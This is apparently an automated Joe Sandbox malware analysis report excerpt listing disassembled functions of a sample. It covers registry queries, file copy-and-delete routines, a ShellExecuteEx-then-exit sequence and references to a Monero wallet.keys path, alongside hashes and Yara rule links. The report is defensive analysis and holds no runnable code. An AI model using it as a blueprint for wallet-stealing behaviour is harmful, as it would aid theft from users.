                              • Instruction ID: a5410256b9b21942cbf67d1682ebfcc0613ab0c75eec18857eb364cbb996715c
                              • Opcode Fuzzy Hash: e1f4b6b50fc85bdf12e54b098c2a782d13fd99280a656482c1a0fc8d679e0f11
                              • Instruction Fuzzy Hash: A5616E70A10618EFDB29EFA4DD96FED77B9AF44300F008018F94A5F191EB746A45CB92
                              Function 003340B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,0109DBA0,00000000,00020119,?), ref: 003340F4
                              • RegQueryValueExA.ADVAPI32(?,0109DFD8,00000000,00000000,00000000,000000FF), ref: 00334118
                              • RegCloseKey.ADVAPI32(?), ref: 00334122
                              • lstrcat.KERNEL32(?,00000000), ref: 00334147
                              • lstrcat.KERNEL32(?,0109E020), ref: 0033415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: d639921bf1bfa1da8f0700c60b03a8c187d58c5aa74b2a459e088fe7a5894af9
                              • Instruction ID: 4873f184f47159820b18be813473477cae80ed9fd6cff0509b3f489c1719522f
                              • Opcode Fuzzy Hash: d639921bf1bfa1da8f0700c60b03a8c187d58c5aa74b2a459e088fe7a5894af9
                              • Instruction Fuzzy Hash: 8B418AB6D001086BDB15EBA4EC96FFE733DAB98300F008558F6155B181EAB55B8C8FD2
                              Function 00337E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00337E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0108C0F0,00000000,00020119,?), ref: 00337E5E
                              • RegQueryValueExA.ADVAPI32(?,0109DAA0,00000000,00000000,000000FF,000000FF), ref: 00337E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00337E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 11a98cff7ae748eb1872b74e66dc753137845147af4616cfb09dcd17a7ca337c
                              • Instruction ID: e430d9b48562c98d9f136358e823f1725f341ba0a62a87f08647b5522a23a7fa
                              • Opcode Fuzzy Hash: 11a98cff7ae748eb1872b74e66dc753137845147af4616cfb09dcd17a7ca337c
                              • Instruction Fuzzy Hash: 01114CB1A44205EBDB14CF98DD89FBBBBBCEB44B11F104159F605A7680D7B468049FA2
                              Function 00339260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(0109DF30,?,?,?,0033140C,?,0109DF30,00000000), ref: 0033926C
                              • lstrcpyn.KERNEL32(0056AB88,0109DF30,0109DF30,?,0033140C,?,0109DF30), ref: 00339290
                              • lstrlen.KERNEL32(?,?,0033140C,?,0109DF30), ref: 003392A7
                              • wsprintfA.USER32 ref: 003392C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: f1ca2a821d77d8ce95701da9813a02cada1638ebeb1fadd11f7ba59ff0c45fbf
                              • Instruction ID: 417561403bfe0f725fa7ff16b3ade4b312399ac2d67f89a7378e65eaddddcd42
                              • Opcode Fuzzy Hash: f1ca2a821d77d8ce95701da9813a02cada1638ebeb1fadd11f7ba59ff0c45fbf
                              • Instruction Fuzzy Hash: 5001D675600208FFCB44DFECC988EAE7BB9FB58355F148548F909AB214C671AA44EF91
                              Function 003212A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003212B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003212BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003212D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003212F5
                              • RegCloseKey.ADVAPI32(?), ref: 003212FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 3b32dafefba1d0db441f808ca405ca0705d0c24d12179469fbe53b74680635c5
                              • Instruction ID: 271877e85a65e0af3f6863de87ad6166cbdb95b5aeb399d29babc72aae77dada
                              • Opcode Fuzzy Hash: 3b32dafefba1d0db441f808ca405ca0705d0c24d12179469fbe53b74680635c5
                              • Instruction Fuzzy Hash: 910136B5A40208BBDB10DFD4DC49FAEB7B8EB58701F008155FA05A7280D6B0AA059F51
                              Function 0033C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: c8472546c2ae59eff46ab83f915cfddc1c114552bd039e380dc22b2503e704ed
                              • Instruction ID: dd12a6c9c0d59194a9a879bc2eb290a08f0741483c86b1cadf69313fb584b6f2
                              • Opcode Fuzzy Hash: c8472546c2ae59eff46ab83f915cfddc1c114552bd039e380dc22b2503e704ed
                              • Instruction Fuzzy Hash: 1741F5B151079C5EDB228B248CD5FFBBBECAB45704F1454E8E9CA9A182D3719A44CF60
                              Function 00336630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00336663
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00336726
                              • ExitProcess.KERNEL32 ref: 00336755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 54b3e875193296a488ef9c7d060ab4d951b052d801f3a440786a1806e6e17fd5
                              • Instruction ID: 9149965f0688fcbdc4505a60c7e9ec5d4c044cbb2cb792289eed263a2c53eb08
                              • Opcode Fuzzy Hash: 54b3e875193296a488ef9c7d060ab4d951b052d801f3a440786a1806e6e17fd5
                              • Instruction Fuzzy Hash: 52312BB1801218AADB15EB94DCD2BDEB778AF14300F404189F20A7B191DFB46B49CF66
                              Function 003387C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00340E28,00000000,?), ref: 0033882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00338836
                              • wsprintfA.USER32 ref: 00338850
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: f0bb4925639fdb8e4c397b8cb5dc1d1fb41009f7f59f3343846c24a46aecd33b
                              • Instruction ID: f963552c2b03e1fa9d6aaed800bed50b57362d6e82722700b644fce5bf82b9cd
                              • Opcode Fuzzy Hash: f0bb4925639fdb8e4c397b8cb5dc1d1fb41009f7f59f3343846c24a46aecd33b
                              • Instruction Fuzzy Hash: 2D210DB1A44208AFDB04DFD8DD49FAEBBB8FB48711F104119F605B7280C7B9A9059FA1
                              Function 00338D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0033951E,00000000), ref: 00338D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00338D62
                              • wsprintfW.USER32 ref: 00338D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: c22e63b084d662960c6b73e057723ecb46adcb97024669b21f22b90614daac2f
                              • Instruction ID: 4eb3200d18d1f1122674d559959610b96d944b21c20a5a956a6222ee065b5e5a
                              • Opcode Fuzzy Hash: c22e63b084d662960c6b73e057723ecb46adcb97024669b21f22b90614daac2f
                              • Instruction Fuzzy Hash: A6E0E675A50208BFD714DB98DD09E5977B8EB54702F004154FD0AA7240D9B16E149F56
                              Function 0032A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 00338B60: GetSystemTime.KERNEL32(00340E1A,0109A450,003405AE,?,?,003213F9,?,0000001A,00340E1A,00000000,?,01099048,?,\Monero\wallet.keys,00340E17), ref: 00338B86
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0032A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0032A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0032A6BC
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0032A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: a1f6dcdc3d68dd35472230b4d4b74c0ba81c016ba578cee1e7c96dc9b0a99ee2
                              • Instruction ID: 199e237f8ae2b8e866f75abae4af091f9ac344f6a32f563304797550b0b3d14e
                              • Opcode Fuzzy Hash: a1f6dcdc3d68dd35472230b4d4b74c0ba81c016ba578cee1e7c96dc9b0a99ee2
                              • Instruction Fuzzy Hash: F2E10E72810508ABCB06FBA4DCD2EEE7738AF24300F508159F557BA091EF746A4DDB62
                              Function 0032D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 00338B60: GetSystemTime.KERNEL32(00340E1A,0109A450,003405AE,?,?,003213F9,?,0000001A,00340E1A,00000000,?,01099048,?,\Monero\wallet.keys,00340E17), ref: 00338B86
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0032D481
                              • lstrlen.KERNEL32(00000000), ref: 0032D698
                              • lstrlen.KERNEL32(00000000), ref: 0032D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0032D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
